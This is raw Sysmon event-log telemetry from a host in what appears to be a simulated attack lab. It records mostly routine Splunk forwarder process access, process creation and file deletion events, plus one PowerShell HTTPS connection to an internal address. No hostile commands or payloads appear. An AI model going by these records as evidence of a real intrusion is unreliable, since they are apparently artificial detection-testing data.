15:05:31.796{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.796{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-743B-613B-5FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.796{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-743B-613B-5FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.781{B81B27B7-743B-613B-5FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.533{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4117FF8A8B810756A9304643E0105617,SHA256=4FCB45407385268E6D0D39A8A1A6CD7232A81C6C04EE2983DD270F29BF04593B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.311{B81B27B7-743B-613B-5EB4-03000000C801}64886160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.111{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-743B-613B-5EB4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.111{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.111{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.111{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-743B-613B-5EB4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.111{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.111{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.111{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-743B-613B-5EB4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.097{B81B27B7-743B-613B-5EB4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035343587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:58.270{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52569-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.548{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EBD9DF008EF905C9633D873F3A1DC9F,SHA256=4039E13474D9341937D52300645F21A2CF4B634F63FD2140A77D47F703A26134,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.495{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-743C-613B-60B4-03000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.495{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.495{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.495{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.495{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.495{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-743C-613B-60B4-03000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.495{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-743C-613B-60B4-03000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.480{B81B27B7-743C-613B-60B4-03000000C801}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=77B42F759010E7CC4EC08773596AABE3,SHA256=9398163325D7FA9536F54F6DC77E46E3351EB86C0BAA256A57AB5F3EFF673E96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.111{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAE58AA8C6B0CB5CCB89923290B4ACBE,SHA256=BC207AA565011425E34199EE2FD67059119922566FFFD5480B53B4B503E88D12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.111{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC615A3208EB1E6B6D4E5C9682D8B655,SHA256=4732BDF97D7759693B11338503BAC9BA771D6C952F070B0CBF8968E9C35233F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:33.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1107B7B1AF27E8836439849607F9C5CA,SHA256=DCCF3C57CC5C5B984D0CE348520D1C3C5981110B2C86E655FDE87284CDB8E51C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:33.496{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAE58AA8C6B0CB5CCB89923290B4ACBE,SHA256=BC207AA565011425E34199EE2FD67059119922566FFFD5480B53B4B503E88D12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:34.579{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4A3F9EA025334506539AD49E6861E4D,SHA256=8C466176F1F98E05DDD754FD137F6ED13CAB2635B201B1AB4E17C9CB00DDAF3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:35.627{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DAF6DCBAE9DBFE827E0199FFD7C0F50,SHA256=E2693492ACC9B67AB101F34C1F51418FC691A1093BDA319285B93A779DF4DA26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:00.135{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52570-false10.0.1.12-8000- 23542300x800000000000000035343595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:36.678{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D42092525A5B2926812983BC61109545,SHA256=F3906E8CF3CB8C45A929800988E572CC1B49C89EACB9DE12EE5D54AE720679A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:36.610{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75fc4e10.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:36.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AE058FA9FAB743EF4AC869ADF8248B41,SHA256=75287BBE8BC98F82BEEBE7C2664A161639F7666379C8F8CB8E85C504B132FEE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 